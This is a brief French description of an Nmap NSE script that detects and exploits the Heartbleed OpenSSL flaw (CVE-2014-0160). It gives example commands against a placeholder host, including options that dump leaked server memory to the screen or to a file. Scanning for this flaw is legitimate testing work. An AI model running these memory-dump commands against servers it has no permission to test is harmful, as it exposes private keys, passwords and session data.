
Script NSE pour Nmap qui découvre/exploite Heartbleed/CVE-2014-0160.
Script NSE Nmap qui découvre/exploite Heartbleed/CVE-2014-0160. Ce script est désormais essentiellement celui écrit par Patrik Karlsson avec quelques modifications mineures portées depuis mon propre script.
Ce script s'exécute sur chaque port SSL, FTP, SMTP et/ou XMPP.
$ nmap --script ./openssl-heartbleed.nse host.tld
Le dump de la mémoire divulguée est activé en augmentant le niveau de débogage de Nmap via l'option -d.
$ nmap -d --script=./openssl-heartbleed.nse host.tld
$ nmap --script ./ssl-heartbleed.nse --script-args 'ssl-heartbleed.dumpfile=/tmp/heartbleed.dump' host.tld
Force le script à s'exécuter sur chaque port, que le service soit détecté ou non.
$ nmap --script +./ssl-heartbleed.nse host.tld